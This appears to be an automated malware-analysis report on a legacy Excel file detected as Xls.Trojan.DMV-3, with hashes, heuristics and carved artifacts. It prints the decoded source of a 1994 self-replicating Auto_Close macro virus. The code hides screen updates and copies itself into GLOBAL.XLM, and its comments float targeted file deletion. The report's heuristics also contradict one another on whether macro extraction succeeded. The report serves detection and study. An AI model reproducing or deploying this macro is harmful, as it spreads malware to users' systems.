Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 067ff9f2bdc6dbcd…

MALICIOUS

Office (OLE)

Size: 93.5 KB
Created: 1997-11-05 01:29:32
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: 5f7b166550b0c6440d73e6af1b9cb7af
SHA-1: 554d15e37910f596af70532c7286004eb9a91ddb
SHA-256: 067ff9f2bdc6dbcdb60b154f9f66927d78b10e85c37a50b59d81f4f528350e83
Risk Score: 302

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Xls.Trojan.DMV-3. It contains VBA macros, specifically an Auto_Close macro designed to execute when the Excel workbook is closed. This macro attempts to propagate itself by infecting the GLOBAL.XLM file, which is a common technique for spreading malware within older Excel versions. The VBA code explicitly mentions infecting GLOBAL.XLM and uses the module name 'Sheet01' for the injected virus code.

Heuristics (7)

  • ClamAV: Xls.Trojan.DMV-3 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.DMV-3
  • Embedded Office document has suspicious static findings [critical] EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE
    A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
  • OLE document has large unaccounted-for region [high] OLE_SLACK_ANOMALY
    OLE file is 84,184 bytes but its declared streams total only 0 bytes — 84,184 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected [medium, 1 related finding] OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Close macro [high] OLE_VBA_AUTOCLOSE
    Document contains an Auto_Close macro
  • CFB header with no readable streams [medium] OLE_PARSE_EMPTY_STREAMS
    The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.
  • Unsupported Office format for VBA extraction [info] OFFICE_FORMAT_UNSUPPORTED
    olevba could not extract VBA macros (AttributeError); format-agnostic byte-level scans still ran. Likely legacy, encrypted, or malformed OLE/OOXML — re-scanning the same bytes will yield the same outcome.

Extracted artifacts (5)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8748 bytes
SHA-256: 3a85641992aa6cc565b416c9ad4275a30d7d5948d7a111de7442992a75230136
Detection: ClamAV: Xls.Trojan.DMV-3
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Sheet01"

' Excel Auto_Close DMV
' 12/27/94 by joelm@eskimo.com
'
' This is a quick and dirty demonstration of a DMV running under
' Microsoft Excel 5.0.  It demonstrates the security risks of
' automatic macros.
'
' The code executes when Excel closes.  It infects the global macro file.
' No data files are infected, although it would be possible to add
' additional VBA code to do so (ala the Word DMV.DOC file).

Sub Auto_Close()
Attribute Auto_Close.VB_Description = "Macro recorded 12/27/94 by joelm"
Attribute Auto_Close.VB_ProcData.VB_Invoke_Func = " \n0"

'this is the virus propogation code that infects global.xlm

'for testing if global.xlm and virus are already present
globalPresent = 0
virusPresent = 0

'turn screen updating off so the results can't be seen by the user
Application.ScreenUpdating = False
For x = 1 To Application.Workbooks.Count
    'is a global.xlm file present?
    If Application.Workbooks(x).Name = "GLOBAL.XLM" Then
        'it exists
        globalPresent = 1
        'now see if the macro virus has already been installed
        For y = 1 To Application.Workbooks("GLOBAL.XLM").Modules.Count
            'the module with the virus is given an innocent looking
            'name that blends in with the other sheets
            If Application.Workbooks("GLOBAL.XLM").Modules(y).Name = "Sheet01" Then
                virusPresent = 1
                MsgBox "Virus already installed in GLOBAL.XLM"
            End If
        Next
        
        'global.xlm exists, but the virus hasn't been installed, so install
        'it from this file
        If virusPresent = 0 Then
            'make it visible - this is required before a copy
            Windows("GLOBAL.XLM").Visible = True
            'copy this module into it
            MsgBox "GLOBAL.XLM exists.  Adding Auto_Close virus to it."
            Application.Workbooks("DMV.XLS").Modules("Sheet01").Copy after:=Application.Workbooks("GLOBAL.XLM").Modules(1)
            'make it invisible again
            Windows("GLOBAL.XLM").Visible = False
            'save it
            Application.Workbooks("GLOBAL.XLM").Save
        End If
    End If
Next
    'global.xlm doesn't exist, so create one and save macro to
    If globalPresent = 0 Then
        MsgBox "GLOBAL.XLM doesn't exist.  Creating it now."
        'copy the module into the startup directory
        Application.Workbooks("DMV.XLS").SaveCopyAs Application.StartupPath + "\GLOBAL.XLM"
        'now we need to open it up and make it visible
        Application.Workbooks.Open (Application.StartupPath + "\GLOBAL.XLM")
        Windows("GLOBAL.XLM").Visible = False
        'save the change
        Application.Workbooks("GLOBAL.XLM").Save
    End If
    
'turn screen updating back on
Application.ScreenUpdating = True
    
MsgBox "The virus has been spread.  Now execute some other code, for example..."

'this is the code that executes after the virus is spread, some malicious
'examples that use simple VB properties are shown

orgName = Application.OrganizationName
MsgBox ("Just checked which organization Excel was registered to..." + Chr(10) + Chr(10) + "A DMV could selectively target a business, government agency, or organization.  For example, delete all files if this software was licensed to IBM.")

useName = Application.UserName
MsgBox "Just checked who Excel was registered to..." + Chr(10) + Chr(10) + "A DMV could selectively target a specific individual for revenge or eavesdropping."

theCountry = Application.International(xlCountryCode)
MsgBox "Just checked Excel's country code..." + Chr(10) + Chr(10) + "A DMV could selectively target users within a certain country.  For example, overwrite files if an Arabic version of Excel was running."

theDate = Date
MsgBox "Just checked the date..." + Chr(10) + Chr(10) + "A DMV could serve as a time bomb.  For example, start renaming files after September 1995, so it appears problems are related to the release of Microsoft Windows 95."

theOS = Application.Op
... (truncated)
Filename: embedded_office_off00002d28.ole
Kind: embedded-office
Source: Embedded OLE/CFB Office body inside ole container at offset 0x2D28
Size: 84184 bytes
SHA-256: 2b4d80d39c0383d55ecb34c7e48d769ec7b2b32ca3fa96cd0fd7d746739e8cf7

Filename: embedded_office_off00004e7d.ole
Kind: embedded-office
Source: Embedded OLE/CFB Office body inside ole container at offset 0x4E7D
Size: 75651 bytes
SHA-256: ee13cfcc8dfda0703b02523df20e115016019da2d9cd091bc687ee2e89199452

Filename: embedded_office_off00005088.ole
Kind: embedded-office
Source: Embedded OLE/CFB Office body inside ole container at offset 0x5088
Size: 75128 bytes
SHA-256: 352dc36a35a00746b18564532dd02c670518885d378ad8ff195dea8cb7479bef

Filename: embedded_office_off0000512d.ole
Kind: embedded-office
Source: Embedded OLE/CFB Office body inside ole container at offset 0x512D
Size: 74963 bytes
SHA-256: a04f7e192998f18047de1d9c2715e99182d71d9127f505bc87fb9adada1ac822